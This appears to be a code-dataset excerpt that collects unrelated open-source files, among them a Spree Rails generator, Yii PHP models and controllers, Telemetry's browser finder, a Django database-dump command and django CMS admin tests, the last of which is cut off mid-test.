code stringlengths 3 1.05M | repo_name stringlengths 4 116 | path stringlengths 4 991 | language stringclasses 9 values | license stringclasses 15 values | size int32 3 1.05M |
|---|---|---|---|---|---|
module SpreeSuppliers
  module Generators
    # Rails generator that wires the spree_suppliers extension into a host
    # application: asset manifests, migrations and (optionally) db:migrate.
    class InstallGenerator < Rails::Generators::Base
      include Rails::Generators::Migration

      # Registers the extension's store and admin javascript bundles.
      def add_javascripts
        append_file "app/assets/javascripts/store/all.js", "//= require store/spree_suppliers\n"
        append_file "app/assets/javascripts/admin/all.js", "//= require admin/spree_suppliers\n"
      end

      # Registers the stylesheet bundles just before the closing `*/` of the
      # sprockets manifest comment.
      def add_stylesheets
        inject_into_file "app/assets/stylesheets/store/all.css", " *= require store/spree_suppliers\n", :before => /\*\//, :verbose => true
        inject_into_file "app/assets/stylesheets/admin/all.css", " *= require admin/spree_suppliers\n", :before => /\*\//, :verbose => true
      end

      # Copies the extension's migrations into the host application.
      def add_migrations
        run 'bundle exec rake railties:install:migrations FROM=spree_suppliers'
      end

      # Offers to run the copied migrations immediately. An empty answer
      # (plain Enter) counts as "yes".
      def run_migrations
        res = ask "Would you like to run the migrations now? [Y/n]"
        if res == "" || res.downcase == "y"
          run 'bundle exec rake db:migrate'
        else
          # Fixed typo in user-facing message ("Skiping" -> "Skipping").
          puts "Skipping rake db:migrate, don't forget to run it!"
        end
      end
    end
  end
end
| johndavid400/spree_suppliers | lib/generators/spree_suppliers/install/install_generator.rb | Ruby | bsd-3-clause | 1,110 |
/*
Copyright (c) 2016, Technikradio
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Node2 nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/**
*
*/
package org.technikradio.node.tests.engine;
import static org.junit.Assert.*;
import javax.swing.JPanel;
import org.junit.Before;
import org.junit.Test;
import org.technikradio.node.engine.plugin.settings.SettingsPage;
/**
* This is the test case for the settings page class
* @author doralitze
*
*/
/**
 * Unit test covering the panel accessor of
 * {@link org.technikradio.node.engine.plugin.settings.SettingsPage}.
 *
 * @author doralitze
 */
public class SettingsPageTest {
	private SettingsPage page;
	private JPanel panel;

	/**
	 * Creates a fresh settings page backed by an empty panel.
	 *
	 * @throws java.lang.Exception In case of an exception
	 */
	@Before
	public void setUp() throws Exception {
		panel = new JPanel();
		page = new SettingsPage("org.technikradio.node.tests.samplesettingspage");
		page.setPanel(panel);
	}

	/**
	 * Test method for {@link org.technikradio.node.engine.plugin.settings.SettingsPage#getPanel()}.
	 */
	@Test
	public final void testGetPanel() {
		assertEquals(panel, page.getPanel());
	}
}
| Technikradio/Node2 | src/tests/org/technikradio/node/tests/engine/SettingsPageTest.java | Java | bsd-3-clause | 2,311 |
/*******************************************************************************
* Copyright SemanticBits, Northwestern University and Akaza Research
*
* Distributed under the OSI-approved BSD 3-Clause License.
* See http://ncip.github.com/caaers/LICENSE.txt for details.
******************************************************************************/
package gov.nih.nci.cabig.caaers.validation;
import java.util.ArrayList;
import java.util.List;
import org.apache.commons.lang.StringUtils;
public class ValidationErrors {
List<ValidationError> errors;
public ValidationErrors() {
errors = new ArrayList<ValidationError>();
}
public ValidationError addValidationError(String code, String msg, Object... r1) {
ValidationError ve = new ValidationError(code, msg, r1);
errors.add(ve);
return ve;
}
public void addValidationErrors(List<ValidationError> errorList){
for(ValidationError e : errorList) errors.add(e);
}
public String toString() {
return errors.toString();
}
public int getErrorCount() {
return errors.size();
}
public boolean hasErrors() {
return errors.size() > 0;
}
public List<ValidationError> getErrors() {
return errors;
}
public ValidationError getErrorAt(int index) {
return errors.get(index);
}
public boolean containsErrorWithCode(String code){
for(ValidationError error : errors){
if(StringUtils.equals(error.getCode(),code)) return true;
}
return false;
}
}
| NCIP/caaers | caAERS/software/core/src/main/java/gov/nih/nci/cabig/caaers/validation/ValidationErrors.java | Java | bsd-3-clause | 1,634 |
<?php
namespace common\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use common\models\Fund;
/**
* FundSearch represents the model behind the search form about `common\models\Fund`.
*/
class FundSearch extends Fund
{
    /**
     * Validation rules for the incoming search parameters.
     * @inheritdoc
     */
    public function rules()
    {
        return [
            [['id', 'created_at', 'updated_at'], 'integer'],
            [['name', 'num', 'date', 'week', 'month', 'quarter', 'year', 'three_year', 'all'], 'safe'],
        ];
    }

    /**
     * @inheritdoc
     */
    public function scenarios()
    {
        // bypass scenarios() implementation in the parent class
        return Model::scenarios();
    }

    /**
     * Builds an ActiveDataProvider over Fund with the given filters applied.
     *
     * @param array $params request parameters to load into the model
     *
     * @return ActiveDataProvider
     */
    public function search($params)
    {
        $query = Fund::find();
        $provider = new ActiveDataProvider([
            'query' => $query,
            'pagination' => ['pageSize' => 20],
        ]);

        $this->load($params);
        if (!$this->validate()) {
            // uncomment the following line if you do not want to return any records when validation fails
            // $query->where('0=1');
            return $provider;
        }

        // Exact-match filters for the integer columns.
        $query->andFilterWhere([
            'id' => $this->id,
            'created_at' => $this->created_at,
            'updated_at' => $this->updated_at,
        ]);

        // Substring (LIKE) filters for every text column.
        foreach (['name', 'num', 'date', 'week', 'month', 'quarter', 'year', 'three_year', 'all'] as $attribute) {
            $query->andFilterWhere(['like', $attribute, $this->$attribute]);
        }

        return $provider;
    }
}
| specialnote/myYii | common/models/FundSearch.php | PHP | bsd-3-clause | 2,090 |
<?php
namespace backend\controllers\settings;
use Yii;
use yii\filters\AccessControl;
use yii\web\Controller;
use yii\filters\VerbFilter;
use backend\models\settings\Details;
use yii\web\User;
/**
* Site controller
*/
/**
 * Backend controller for editing the (singleton) company details record.
 */
class DetailsController extends Controller
{
    /**
     * @inheritdoc
     */
    public function behaviors()
    {
        return [
            'access' => [
                'class' => AccessControl::className(),
                'rules' => [
                    [
                        'actions' => ['login', 'error'],
                        'allow' => true,
                    ],
                    [
                        'actions' => ['index'],
                        'allow' => true,
                        'roles' => ['@'],
                        // Only authenticated users with access level above 50
                        // may edit the details record.
                        'matchCallback' => function ($rule, $action) {
                            // Comparison already yields a boolean; the
                            // previous `? true : false` ternary was redundant.
                            return Yii::$app->user->identity->access > 50;
                        }
                    ],
                ],
            ],
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    'logout' => ['post'],
                ],
            ],
        ];
    }
    /**
     * @inheritdoc
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
        ];
    }
    /**
     * Displays and processes the details edit form.
     *
     * @return string|\yii\web\Response rendered form or redirect after save
     */
    public function actionIndex()
    {
        // NOTE(review): assumes the row with id=1 always exists; findOne()
        // returns null otherwise and load() would fail — confirm seed data.
        $model = Details::findOne(1);
        if($model->load(Yii::$app->request->post()) && $model->validate()){
            $model->save();
            Yii::$app->getSession()->setFlash('success', 'Изменения сохранены');
            return $this->redirect(['/settings/details/index']);
        }
        return $this->render('form',[
            'model' => $model,
            'action' => 'update',
        ]);
    }
}
| ocrm/crm | backend/controllers/settings/DetailsController.php | PHP | bsd-3-clause | 1,893 |
<?php defined('SYSPATH') OR die('No direct access allowed.');
// Transparent extension point (Kohana convention): lets the application
// override the base behavior class without editing the vendor file.
class Jam_Behavior_Promotable_Purchase extends Kohana_Jam_Behavior_Promotable_Purchase {}
| OpenBuildings/promotions | classes/Jam/Behavior/Promotable/Purchase.php | PHP | bsd-3-clause | 153 |
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Finds browsers that can be controlled by telemetry."""
import logging
from telemetry import decorators
from telemetry.internal.backends.chrome import android_browser_finder
from telemetry.internal.backends.chrome import cros_browser_finder
from telemetry.internal.backends.chrome import desktop_browser_finder
from telemetry.internal.browser import browser_finder_exceptions
from telemetry.internal.platform import device_finder
# Finder modules probed for available browsers. The list order also defines
# the preference order used when resolving --browser=any (see FindBrowser).
BROWSER_FINDERS = [
  desktop_browser_finder,
  android_browser_finder,
  cros_browser_finder,
]
def FindAllBrowserTypes(options):
  """Returns browser type strings supported by all registered finders."""
  all_types = []
  for finder in BROWSER_FINDERS:
    all_types += finder.FindAllBrowserTypes(options)
  return all_types
@decorators.Cache
def FindBrowser(options):
  """Finds the best PossibleBrowser object given a BrowserOptions object.

  Args:
    options: A BrowserOptions object.

  Returns:
    A PossibleBrowser object, or None if browser_type is 'any' and no
    browser was found.

  Raises:
    BrowserFinderException: Options improperly set, or an error occurred.
  """
  # Test hook: a fake options object carries its browser directly.
  if options.__class__.__name__ == '_FakeBrowserFinderOptions':
    return options.fake_possible_browser
  # Validate mutually dependent option combinations before probing devices.
  if options.browser_type == 'exact' and options.browser_executable == None:
    raise browser_finder_exceptions.BrowserFinderException(
        '--browser=exact requires --browser-executable to be set.')
  if options.browser_type != 'exact' and options.browser_executable != None:
    raise browser_finder_exceptions.BrowserFinderException(
        '--browser-executable requires --browser=exact.')
  if options.browser_type == 'cros-chrome' and options.cros_remote == None:
    raise browser_finder_exceptions.BrowserFinderException(
        'browser_type=cros-chrome requires cros_remote be set.')
  if (options.browser_type != 'cros-chrome' and
      options.browser_type != 'cros-chrome-guest' and
      options.cros_remote != None):
    raise browser_finder_exceptions.BrowserFinderException(
        '--remote requires --browser=cros-chrome or cros-chrome-guest.')
  # Collect candidate browsers (and each finder's preferred default) across
  # every device matching the options.
  devices = device_finder.GetDevicesMatchingOptions(options)
  browsers = []
  default_browsers = []
  for device in devices:
    for finder in BROWSER_FINDERS:
      if(options.browser_type and options.browser_type != 'any' and
         options.browser_type not in finder.FindAllBrowserTypes(options)):
        continue
      curr_browsers = finder.FindAllAvailableBrowsers(options, device)
      new_default_browser = finder.SelectDefaultBrowser(curr_browsers)
      if new_default_browser:
        default_browsers.append(new_default_browser)
      browsers.extend(curr_browsers)
  # No --browser given: fall back to the most recently built default, or the
  # only available browser; otherwise fail with the list of choices.
  if options.browser_type == None:
    if default_browsers:
      default_browser = sorted(default_browsers,
                               key=lambda b: b.last_modification_time())[-1]
      logging.warning('--browser omitted. Using most recent local build: %s',
                      default_browser.browser_type)
      default_browser.UpdateExecutableIfNeeded()
      return default_browser
    if len(browsers) == 1:
      logging.warning('--browser omitted. Using only available browser: %s',
                      browsers[0].browser_type)
      browsers[0].UpdateExecutableIfNeeded()
      return browsers[0]
    raise browser_finder_exceptions.BrowserTypeRequiredException(
        '--browser must be specified. Available browsers:\n%s' %
        '\n'.join(sorted(set([b.browser_type for b in browsers]))))
  # --browser=any: pick the browser whose type comes first in the combined
  # finder-priority order.
  if options.browser_type == 'any':
    types = FindAllBrowserTypes(options)
    # NOTE(review): cmp-style sort (Python 2 only); under Python 3 this
    # would need a key= function instead.
    def CompareBrowsersOnTypePriority(x, y):
      x_idx = types.index(x.browser_type)
      y_idx = types.index(y.browser_type)
      return x_idx - y_idx
    browsers.sort(CompareBrowsersOnTypePriority)
    if len(browsers) >= 1:
      browsers[0].UpdateExecutableIfNeeded()
      return browsers[0]
    else:
      return None
  # A specific --browser type: keep only candidates of that type which also
  # support the requested browser options.
  matching_browsers = [
      b for b in browsers
      if b.browser_type == options.browser_type and
      b.SupportsOptions(options.browser_options)]
  chosen_browser = None
  if len(matching_browsers) == 1:
    chosen_browser = matching_browsers[0]
  elif len(matching_browsers) > 1:
    # Ties are broken by the most recently modified build.
    logging.warning('Multiple browsers of the same type found: %s',
                    repr(matching_browsers))
    chosen_browser = sorted(matching_browsers,
                            key=lambda b: b.last_modification_time())[-1]
  if chosen_browser:
    logging.info('Chose browser: %s', repr(chosen_browser))
    chosen_browser.UpdateExecutableIfNeeded()
  return chosen_browser
@decorators.Cache
def GetAllAvailableBrowsers(options, device):
  """Returns a list of available browsers on the device.

  Args:
    options: A BrowserOptions object.
    device: The target device, which can be None.

  Returns:
    A list of browser instances (empty when device is None).

  Raises:
    BrowserFinderException: Options are improperly set, or an error occurred.
  """
  if not device:
    return []
  found = []
  for finder in BROWSER_FINDERS:
    found += finder.FindAllAvailableBrowsers(options, device)
  return found
@decorators.Cache
def GetAllAvailableBrowserTypes(options):
  """Returns a sorted list of available browser type strings.

  Args:
    options: A BrowserOptions object.

  Returns:
    A sorted list of browser type strings.

  Raises:
    BrowserFinderException: Options are improperly set, or an error occurred.
  """
  devices = device_finder.GetDevicesMatchingOptions(options)
  possible_browsers = []
  for device in devices:
    possible_browsers.extend(GetAllAvailableBrowsers(options, device))
  types = set(browser.browser_type for browser in possible_browsers)
  # The reference build should be available for mac, linux and win, but the
  # desktop browser finder won't return it in the list of browsers.
  for browser in possible_browsers:
    desktop_os = (browser.target_os == 'darwin' or
                  browser.target_os.startswith('linux') or
                  browser.target_os.startswith('win'))
    if desktop_os:
      types.add('reference')
      break
  return sorted(types)
| catapult-project/catapult-csm | telemetry/telemetry/internal/browser/browser_finder.py | Python | bsd-3-clause | 6,167 |
<?php
// module/SousRubrique/src/SousRubrique/Form/SousRubriqueForm.php:
namespace Galerie\Form;
use Zend\Form\Form;
use Zend\Form\Element;
use Rubrique\Model\RubriqueDao;
use Contenu\Form\ContenuForm;
/**
* Class GalerieForm
* @package Galerie\Form
*/
/**
 * Form for galerie content: the base content fields plus two image paths.
 */
class GalerieForm extends ContenuForm {

    /**
     * Builds an id => libelle map of every rubrique.
     *
     * @return array
     */
    protected function getRubriques() {
        $dao = new RubriqueDao();
        $result = array();
        foreach ($dao->getAllRubriques("array") as $rubrique) {
            $result[$rubrique['id']] = $rubrique['libelle'];
        }
        return $result;
    }

    /**
     * GalerieForm constructor. The supplied name is ignored; the form is
     * always registered as 'galerieform'.
     *
     * @param null $name
     */
    public function __construct($name = null) {
        parent::__construct('galerieform');
        // Two text inputs holding the gallery image paths.
        $fields = array(
            'imagepath'  => 'Image',
            'imagepath2' => 'Image 2',
        );
        foreach ($fields as $field => $label) {
            $this->add(array(
                'name' => $field,
                'attributes' => array(
                    'type' => 'text'
                ),
                'options' => array(
                    'label' => $this->utils->translate($label)
                ),
            ));
        }
    }
}
| rongeb/anit_cms_for_zf3 | module/Galerie/src/Form/GalerieForm.php | PHP | bsd-3-clause | 1,872 |
import os
from django.core.management.base import BaseCommand
from django.conf import settings
from fabtastic import db
class Command(BaseCommand):
    """Management command that dumps a SQL backup of the configured DB."""
    args = '[<output_file_path>]'
    help = 'Dumps a SQL backup of your entire DB. Defaults to CWD.'

    def get_dump_path(self, db_alias):
        """
        Determines the path to write the SQL dump to. Depends on whether the
        user specified a path or not.

        :param db_alias: Database alias key into settings.DATABASES.
        :returns: User-supplied path, or an auto-named file in the CWD.
        """
        # Idiomatic truthiness check instead of len(...) > 0.
        if self.args:
            return self.args[0]
        dump_filename = db.util.get_db_dump_filename(db_alias=db_alias)
        return os.path.join(os.getcwd(), dump_filename)

    def handle(self, *args, **options):
        """
        Entry point: resolves DB settings and writes the dump file.
        """
        self.args = args
        self.options = options
        db_alias = getattr(settings, 'FABTASTIC_DIRECT_TO_DB_ALIAS', 'default')
        # Get DB settings from settings.py.
        database = db.util.get_db_setting_dict(db_alias=db_alias)
        # Figure out where to dump the file to.
        dump_path = self.get_dump_path(db_alias)
        # Run the db dump.
        db.dump_db_to_file(dump_path, database)
# -*- coding: utf-8 -*-
import json
import datetime
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.sites import site
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission, AnonymousUser
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.http import (Http404, HttpResponseBadRequest,
QueryDict, HttpResponseNotFound)
from django.utils.encoding import force_text, smart_str
from django.utils import timezone
from django.utils.six.moves.urllib.parse import urlparse
from cms import api
from cms.api import create_page, create_title, add_plugin, publish_page
from cms.admin.change_list import CMSChangeList
from cms.admin.forms import PageForm, AdvancedSettingsForm
from cms.admin.pageadmin import PageAdmin
from cms.constants import TEMPLATE_INHERITANCE_MAGIC
from cms.models import StaticPlaceholder
from cms.models.pagemodel import Page
from cms.models.permissionmodels import GlobalPagePermission, PagePermission
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.models.titlemodels import Title
from cms.test_utils import testcases as base
from cms.test_utils.testcases import (
CMSTestCase, URL_CMS_PAGE_DELETE, URL_CMS_PAGE,URL_CMS_TRANSLATION_DELETE,
URL_CMS_PAGE_CHANGE_LANGUAGE, URL_CMS_PAGE_CHANGE,
URL_CMS_PAGE_ADD, URL_CMS_PAGE_PUBLISHED
)
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_cms_setting
from cms.utils.compat import DJANGO_1_10
from cms.utils.urlutils import admin_reverse
class AdminTestsBase(CMSTestCase):
    """Base class providing user fixtures shared by the page-admin tests."""
    @property
    def admin_class(self):
        # The ModelAdmin instance registered for Page on the default site.
        return site._registry[Page]
    def _get_guys(self, admin_only=False, use_global_permissions=True):
        # Returns (superuser, staff_user), or just the superuser when
        # admin_only is True.
        admin_user = self.get_superuser()
        if admin_only:
            return admin_user
        staff_user = self._get_staff_user(use_global_permissions)
        return admin_user, staff_user
    def _get_staff_user(self, use_global_permissions=True):
        """Creates an active staff user holding page/title model permissions.

        When use_global_permissions is True, also attaches a
        GlobalPagePermission granting change/delete/publish/move (but not
        advanced settings or permission management) for all sites.
        """
        USERNAME = 'test'
        # Custom user models may use the email address as the username field.
        if get_user_model().USERNAME_FIELD == 'email':
            normal_guy = get_user_model().objects.create_user(USERNAME, 'test@test.com', 'test@test.com')
        else:
            normal_guy = get_user_model().objects.create_user(USERNAME, 'test@test.com', USERNAME)
        normal_guy.is_staff = True
        normal_guy.is_active = True
        normal_guy.save()
        normal_guy.user_permissions = Permission.objects.filter(
            codename__in=['change_page', 'change_title', 'add_page', 'add_title', 'delete_page', 'delete_title']
        )
        if use_global_permissions:
            gpp = GlobalPagePermission.objects.create(
                user=normal_guy,
                can_change=True,
                can_delete=True,
                can_change_advanced_settings=False,
                can_publish=True,
                can_change_permissions=False,
                can_move_page=True,
            )
            gpp.sites = Site.objects.all()
        return normal_guy
class AdminTestCase(AdminTestsBase):
    def test_extension_not_in_admin(self):
        """Extension change URLs must not appear on the admin index page."""
        admin_user, staff = self._get_guys()
        with self.login_user_context(admin_user):
            request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en',)
            response = site.index(request)
            self.assertNotContains(response, '/mytitleextension/')
            self.assertNotContains(response, '/mypageextension/')
    def test_2apphooks_with_same_namespace(self):
        """Two pages may not be saved with the same apphook namespace."""
        PAGE1 = 'Test Page'
        PAGE2 = 'Test page 2'
        APPLICATION_URLS = 'project.sampleapp.urls'
        admin_user, normal_guy = self._get_guys()
        current_site = Site.objects.get(pk=1)
        # The admin creates the page
        page = create_page(PAGE1, "nav_playground.html", "en",
                           site=current_site, created_by=admin_user)
        page2 = create_page(PAGE2, "nav_playground.html", "en",
                            site=current_site, created_by=admin_user)
        page.application_urls = APPLICATION_URLS
        page.application_namespace = "space1"
        page.save()
        page2.application_urls = APPLICATION_URLS
        page2.save()
        # The admin edits the page (change the page name for ex.)
        page_data = {
            'title': PAGE2,
            'slug': page2.get_slug(),
            'language': 'en',
            'site': page.site.pk,
            'template': page2.template,
            'application_urls': 'SampleApp',
            'application_namespace': 'space1',
        }
        with self.login_user_context(admin_user):
            resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data)
            self.assertEqual(resp.status_code, 302)
            self.assertEqual(Page.objects.filter(application_namespace="space1").count(), 1)
            # Reusing "space1" on a second page must be rejected (form re-rendered, 200).
            resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
            self.assertEqual(resp.status_code, 200)
            # A distinct namespace is accepted (redirect, 302).
            page_data['application_namespace'] = 'space2'
            resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
            self.assertEqual(resp.status_code, 302)
    def test_delete(self):
        """Deleting a published page with an 'en' child redirects to the list."""
        admin_user = self.get_superuser()
        create_page("home", "nav_playground.html", "en",
                    created_by=admin_user, published=True)
        page = create_page("delete-page", "nav_playground.html", "en",
                           created_by=admin_user, published=True)
        create_page('child-page', "nav_playground.html", "en",
                    created_by=admin_user, published=True, parent=page)
        body = page.placeholders.get(slot='body')
        add_plugin(body, 'TextPlugin', 'en', body='text')
        page.publish('en')
        with self.login_user_context(admin_user):
            data = {'post': 'yes'}
            response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
            self.assertRedirects(response, URL_CMS_PAGE)
    def test_delete_diff_language(self):
        """Deletion works when the child page exists in another language ('de')."""
        admin_user = self.get_superuser()
        create_page("home", "nav_playground.html", "en",
                    created_by=admin_user, published=True)
        page = create_page("delete-page", "nav_playground.html", "en",
                           created_by=admin_user, published=True)
        create_page('child-page', "nav_playground.html", "de",
                    created_by=admin_user, published=True, parent=page)
        body = page.placeholders.get(slot='body')
        add_plugin(body, 'TextPlugin', 'en', body='text')
        page.publish('en')
        with self.login_user_context(admin_user):
            data = {'post': 'yes'}
            response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
            self.assertRedirects(response, URL_CMS_PAGE)
    def test_search_fields(self):
        """Every cms ModelAdmin with search_fields must survive a ?q= query."""
        superuser = self.get_superuser()
        from django.contrib.admin import site
        with self.login_user_context(superuser):
            for model, admin_instance in site._registry.items():
                if model._meta.app_label != 'cms':
                    continue
                if not admin_instance.search_fields:
                    continue
                url = admin_reverse('cms_%s_changelist' % model._meta.model_name)
                response = self.client.get('%s?q=1' % url)
                errmsg = response.content
                self.assertEqual(response.status_code, 200, errmsg)
    def test_pagetree_filtered(self):
        """The page changelist must render when filtered by template."""
        superuser = self.get_superuser()
        create_page("root-page", "nav_playground.html", "en",
                    created_by=superuser, published=True)
        with self.login_user_context(superuser):
            url = admin_reverse('cms_page_changelist')
            response = self.client.get('%s?template__exact=nav_playground.html' % url)
            errmsg = response.content
            self.assertEqual(response.status_code, 200, errmsg)
    def test_delete_translation(self):
        """GET shows the confirm page, POST deletes 'de' and 'es-mx' titles."""
        admin_user = self.get_superuser()
        page = create_page("delete-page-translation", "nav_playground.html", "en",
                           created_by=admin_user, published=True)
        create_title("de", "delete-page-translation-2", page, slug="delete-page-translation-2")
        create_title("es-mx", "delete-page-translation-es", page, slug="delete-page-translation-es")
        with self.login_user_context(admin_user):
            response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
            self.assertEqual(response.status_code, 200)
            response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
            self.assertRedirects(response, URL_CMS_PAGE)
            response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
            self.assertEqual(response.status_code, 200)
            response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
            self.assertRedirects(response, URL_CMS_PAGE)
    def test_change_dates(self):
        """Publication dates can be changed via the dates endpoint, both with
        USE_TZ disabled and enabled (times compared in local time)."""
        admin_user, staff = self._get_guys()
        # Naive-datetime configuration.
        with self.settings(USE_TZ=False, TIME_ZONE='UTC'):
            page = create_page('test-page', 'nav_playground.html', 'en')
            page.publish('en')
            draft = page.get_draft_object()
            original_date = draft.publication_date
            original_end_date = draft.publication_end_date
            new_date = timezone.now() - datetime.timedelta(days=1)
            new_end_date = timezone.now() + datetime.timedelta(days=1)
            url = admin_reverse('cms_page_dates', args=(draft.pk,))
            with self.login_user_context(admin_user):
                response = self.client.post(url, {
                    'language': 'en',
                    'site': draft.site.pk,
                    'publication_date_0': new_date.date(),
                    'publication_date_1': new_date.strftime("%H:%M:%S"),
                    'publication_end_date_0': new_end_date.date(),
                    'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
                })
                self.assertEqual(response.status_code, 302)
                draft = Page.objects.get(pk=draft.pk)
                self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
                self.assertEqual(draft.publication_date.timetuple(), new_date.timetuple())
                self.assertEqual(draft.publication_end_date.timetuple(), new_end_date.timetuple())
                if original_end_date:
                    self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
        # Timezone-aware configuration.
        with self.settings(USE_TZ=True, TIME_ZONE='UTC'):
            page = create_page('test-page-2', 'nav_playground.html', 'en')
            page.publish('en')
            draft = page.get_draft_object()
            original_date = draft.publication_date
            original_end_date = draft.publication_end_date
            new_date = timezone.localtime(timezone.now()) - datetime.timedelta(days=1)
            new_end_date = timezone.localtime(timezone.now()) + datetime.timedelta(days=1)
            url = admin_reverse('cms_page_dates', args=(draft.pk,))
            with self.login_user_context(admin_user):
                response = self.client.post(url, {
                    'language': 'en',
                    'site': draft.site.pk,
                    'publication_date_0': new_date.date(),
                    'publication_date_1': new_date.strftime("%H:%M:%S"),
                    'publication_end_date_0': new_end_date.date(),
                    'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
                })
                self.assertEqual(response.status_code, 302)
                draft = Page.objects.get(pk=draft.pk)
                self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
                self.assertEqual(timezone.localtime(draft.publication_date).timetuple(), new_date.timetuple())
                self.assertEqual(timezone.localtime(draft.publication_end_date).timetuple(), new_end_date.timetuple())
                if original_end_date:
                    self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
    def test_change_template(self):
        """change_template: 404 for a missing page, 403 for staff without
        permission, 400 for an unknown template, 200 for a valid one."""
        admin_user, staff = self._get_guys()
        request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en')
        request.method = "POST"
        pageadmin = site._registry[Page]
        with self.login_user_context(staff):
            self.assertRaises(Http404, pageadmin.change_template, request, 1)
            page = create_page('test-page', 'nav_playground.html', 'en')
            response = pageadmin.change_template(request, page.pk)
            self.assertEqual(response.status_code, 403)
        url = admin_reverse('cms_page_change_template', args=(page.pk,))
        with self.login_user_context(admin_user):
            response = self.client.post(url, {'template': 'doesntexist'})
            self.assertEqual(response.status_code, 400)
            response = self.client.post(url, {'template': get_cms_setting('TEMPLATES')[0][0]})
            self.assertEqual(response.status_code, 200)
    def test_changelist_items(self):
        """CMSChangeList.items must mirror the created page hierarchy."""
        admin_user = self.get_superuser()
        first_level_page = create_page('level1', 'nav_playground.html', 'en')
        second_level_page_top = create_page('level21', "nav_playground.html", "en",
                                            created_by=admin_user, published=True, parent=first_level_page)
        second_level_page_bottom = create_page('level22', "nav_playground.html", "en",
                                               created_by=admin_user, published=True,
                                               parent=self.reload(first_level_page))
        third_level_page = create_page('level3', "nav_playground.html", "en",
                                       created_by=admin_user, published=True, parent=second_level_page_top)
        self.assertEqual(Page.objects.all().count(), 4)
        url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
        request = self.get_request(url)
        request.session = {}
        request.user = admin_user
        page_admin = site._registry[Page]
        # Build the CMSChangeList with the same argument list the admin uses.
        cl_params = [request, page_admin.model, page_admin.list_display,
                     page_admin.list_display_links, page_admin.list_filter,
                     page_admin.date_hierarchy, page_admin.search_fields,
                     page_admin.list_select_related, page_admin.list_per_page]
        if hasattr(page_admin, 'list_max_show_all'):  # django 1.4
            cl_params.append(page_admin.list_max_show_all)
        cl_params.extend([page_admin.list_editable, page_admin])
        cl = CMSChangeList(*tuple(cl_params))
        root_page = cl.items[0]
        # Root plus its children in creation order, then the grandchild.
        self.assertEqual(root_page, first_level_page)
        self.assertEqual(root_page.get_children()[0], second_level_page_top)
        self.assertEqual(root_page.get_children()[1], second_level_page_bottom)
        self.assertEqual(root_page.get_children()[0].get_children()[0], third_level_page)
    def test_changelist_get_results(self):
        """CMSChangeList.get_results counts drafts, with and without ?q=."""
        admin_user = self.get_superuser()
        first_level_page = create_page('level1', 'nav_playground.html', 'en', published=True)
        second_level_page_top = create_page('level21', "nav_playground.html", "en",
                                            created_by=admin_user, published=True,
                                            parent=first_level_page)
        second_level_page_bottom = create_page('level22', "nav_playground.html", "en",  # nopyflakes
                                               created_by=admin_user, published=True,
                                               parent=self.reload(first_level_page))
        third_level_page = create_page('level3', "nav_playground.html", "en",  # nopyflakes
                                       created_by=admin_user, published=True,
                                       parent=second_level_page_top)
        fourth_level_page = create_page('level23', "nav_playground.html", "en",  # nopyflakes
                                        created_by=admin_user,
                                        parent=self.reload(first_level_page))
        self.assertEqual(Page.objects.all().count(), 9)
        url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
        request = self.get_request(url)
        request.session = {}
